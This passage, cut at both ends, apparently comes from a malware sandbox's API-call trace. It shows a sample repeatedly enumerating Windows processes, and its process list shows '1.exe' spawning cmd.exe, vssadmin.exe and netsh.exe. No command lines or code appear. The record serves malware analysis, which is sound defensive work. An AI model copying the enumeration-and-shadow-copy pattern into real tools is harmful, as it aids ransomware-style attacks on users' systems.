lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.517] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.518] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0060.519] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.519] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.520] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0060.521] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0060.522] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.523] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0060.523] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0060.527] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0060.527] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x42, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0060.528] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0060.529] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0060.529] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0060.530] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0060.531] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.531] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0060.532] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0061.140] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0061.162] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0061.163] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0061.163] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0061.164] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0061.165] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0061.165] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0061.166] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0061.167] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0061.168] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0061.168] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0061.169] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0061.169] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0061.170] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0061.171] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0061.171] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0061.172] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0061.173] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0061.173] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0061.174] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0061.175] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0061.176] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0061.177] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0061.178] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0061.179] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0061.180] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0061.180] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0061.181] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0061.182] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0061.183] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0061.183] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0061.184] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0061.185] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0061.186] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0061.187] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0061.187] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0061.188] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0061.189] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0061.189] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0061.190] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0061.191] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0061.192] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0061.192] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0061.570] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0061.571] Process32NextW (in: hSnapshot=0x338, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0061.571] CloseHandle (hObject=0x338) returned 1 [0061.571] Sleep (dwMilliseconds=0x1f4) [0062.441] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x30c [0062.448] Process32FirstW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0062.448] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0062.449] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0062.450] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0062.450] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0062.451] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0062.452] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0062.452] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0062.453] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0062.454] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.455] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0062.455] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0062.456] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.457] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0062.457] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.458] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.459] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.459] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0062.460] Process32NextW (in: hSnapshot=0x30c, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, 